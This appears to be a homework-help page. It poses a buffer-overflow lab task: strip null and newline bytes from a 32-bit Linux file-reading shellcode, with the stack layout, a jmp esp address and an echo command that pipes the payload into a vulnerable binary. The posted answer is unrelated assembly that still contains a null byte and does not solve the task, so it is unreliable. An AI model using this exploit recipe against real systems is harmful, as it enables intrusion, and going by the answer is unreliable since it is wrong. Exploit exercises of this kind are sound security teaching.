Please modify the shellcode below. •Remove any null bytes (0x00) •Remove any new

Question

Please modify the shellcode below.
•Remove any null bytes (0x00)
•Remove any newline bytes (0x0a)
•Reduce the size as much as possible

Must include:

- Modified shellcode (both raw bytes and assembly instructions).
- A brief description. Your shellcode size, and what techniques you used to make it so.
- A screenshot proving that it works.

Shellcode:

; [16 bytes buffer] [4 bytes ebp] [4 bytes return] [... bytes shellcode]

; jmp esp @ 0x08048526 (&�0x08)

; filename @ 0x08049b12 (0x08049af4 + 30)

; echo -en "AAAAAAAAAAAAAAAABBBB&������̀�ø���̀��
���̀" > input

; /usr/local/bin/bof < input

; Currently this shellcode is 63 bytes, and contains NULLs (0x00).

; sys_open file

mov eax, 5

mov ebx, 0x08049b12

mov ecx, 0

mov edx, 0

int 0x80

; sys_read from file into memory

mov ebx, eax

mov eax, 3

mov ecx, 0x08049b12

mov edx, 99

int 0x80

; sys_write memory to terminal

mov eax, 4

mov ebx, 1

mov ecx, 0x08049b12

mov edx, 99

int 0x80

Explanation / Answer

.section .data file: .ascii "/root/Desktop/lol" .section .text .global _start: _start: movl $5, %eax movl $file, %ebx movl $03101, %ecx movl $0666, %edx int $0x80 movl %eax, %ebx movl $4, %eax pushl $0x006c6f6c pushl $0x20736920 pushl $0x73696874 movl %esp, %ecx movl $12, %edx int $0x80 movl $1, %eax movl $5, %edx int $0x80

Related Questions

Navigate

• Browse (All)
• Browse P
• Subjects

Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.